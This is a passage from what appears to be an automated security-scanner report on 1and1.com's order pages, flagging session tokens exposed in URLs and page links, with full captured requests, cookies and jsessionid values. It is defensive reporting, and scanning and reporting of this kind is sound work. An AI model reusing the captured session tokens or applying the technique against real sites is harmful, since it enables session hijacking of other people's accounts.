Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:49:45 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerSsl?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.46. http://order.1and1.com/xml/order/FeatureServerVpsOsLinux

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerVpsOsLinux

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerVpsOsLinux;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:51:37 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerVpsOsLinux?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.47. http://order.1and1.com/xml/order/FeatureServerVpsOsWindows

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerVpsOsWindows

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerVpsOsWindows;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:51:51 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerVpsOsWindows?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.48. http://order.1and1.com/xml/order/FeatureSite-buildingAsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingAsp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSite-buildingAsp;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:41:55 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingAsp?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.49. http://order.1and1.com/xml/order/FeatureSite-buildingBlog

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingBlog

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSite-buildingBlog;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:47:19 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=6aV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCksJyorJCU=; Expires=Fri, 07-Apr-2079 22:01:26 GMT; Path=/
ETag: a52fac593cbd71846d3039342fde5fda
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17676


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.50. http://order.1and1.com/xml/order/FeatureSite-buildingBlog

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingBlog

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/FeatureSite-buildingBlog;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:47:19 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=6aV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCksJyorJCU=; Expires=Fri, 07-Apr-2079 22:01:26 GMT; Path=/
ETag: a52fac593cbd71846d3039342fde5fda
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17676


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=FeatureSite-buildingBlog&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=FeatureSite-buildingBlog&amp;page=switch&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.tab.chooseadomain" rel="button-hd-tab-chooseadomain"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
<li style="float:right;"><a class="auswahl" href="/xml/order/costs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.tab.yourcart" rel="button-hd-tab-yourcart" title="Ihre Auswahl im &Uuml;berblick (Warenkorb)"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=FeatureSite-buildingBlog&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.51. http://order.1and1.com/xml/order/FeatureSite-buildingCgi

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingCgi

Issue detail

The URL in the request carries the session token as a ;jsessionid= path parameter (servlet-style URL rewriting) rather than as a cookie. A token in the URL is exposed wherever URLs are recorded: browser history, Referer headers sent to third-party sites, and proxy and web-server logs. The response below is a 301 whose Location drops the token, but the token has already left the browser in the request line:

Request

GET /xml/order/FeatureSite-buildingCgi;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:43:56 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingCgi?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.52. http://order.1and1.com/xml/order/FeatureSite-buildingCnba

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingCnba

Issue detail

The response body rewrites the session token into its links: every navigation href below carries the same ;jsessionid= value, so the token is copied into any bookmark or page made from these links and into the Referer header of requests that follow them:

Request

GET /xml/order/FeatureSite-buildingCnba;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:47:13 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=pbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 22:01:20 GMT; Path=/
ETag: 9de78ef384b1a75fd3107fb41be3e05d
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 27882


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=FeatureSite-buildingCnba&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
